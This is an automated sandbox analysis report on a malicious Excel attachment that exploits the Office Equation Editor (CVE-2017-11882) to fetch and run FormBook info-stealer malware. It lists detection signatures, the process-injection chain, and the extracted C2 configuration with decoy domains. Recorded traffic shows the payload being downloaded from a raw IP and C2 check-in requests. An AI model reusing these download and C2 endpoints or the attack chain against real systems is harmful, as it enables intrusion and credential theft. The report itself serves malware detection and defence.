Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report (RFQ) No.109050.xlsx

Overview

General Information

Sample Name:(RFQ) No.109050.xlsx
Analysis ID:483690
MD5:34cc835409afb805f20b811796d3b1fd
SHA1:90b0fe9c48bb9915e2202e905baa3029ebc6f541
SHA256:bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2916 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2028 cmdline: 'C:\Users\Public\vbc.exe' MD5: A3F424F32B637CB917E6596FAE56E401)
      • vbc.exe (PID: 1292 cmdline: C:\Users\Public\vbc.exe MD5: A3F424F32B637CB917E6596FAE56E401)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3044 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 24 entries

        Sigma Overview

        Exploits:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.84.109, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2916, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2028
        Sigma detected: Execution from Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2028

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: (RFQ) No.109050.xlsxReversingLabs: Detection: 34%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
        Antivirus detection for URL or domainShow sources
        Source: http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7Avira URL Cloud: Label: malware
        Source: www.afishin.com/r48a/Avira URL Cloud: Label: malware
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
        Source: 7.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: global trafficDNS query: name: www.hansel-design.com
        Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80
        Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.corpmat.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
        Source: C:\Windows\explorer.exeNetwork Connect: 144.217.61.66 80
        Source: C:\Windows\explorer.exeDomain query: www.boxtobookshelf.com
        Source: C:\Windows\explorer.exeDomain query: www.hansel-design.com
        Source: C:\Windows\explorer.exeDomain query: www.aubergetoitrouge.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exeNetwork Connect: 75.2.89.208 80
        Source: C:\Windows\explorer.exeDomain query: www.afishin.com
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.afishin.com/r48a/
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.aubergetoitrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.corpmat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.afishin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.boxtobookshelf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 198.12.84.109 198.12.84.109
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:41:57 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22Last-Modified: Wed, 15 Sep 2021 04:42:06 GMTETag: "83800-5cc0151fdab7b"Accept-Ranges: bytesContent-Length: 538624Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 0
        Source: global trafficHTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.84.109Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
        Source: 45F1FF87.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emfJump to behavior
        Source: unknownDNS traffic detected: queries for: www.hansel-design.com
        Source: global trafficHTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.84.109Connection: Keep-Alive
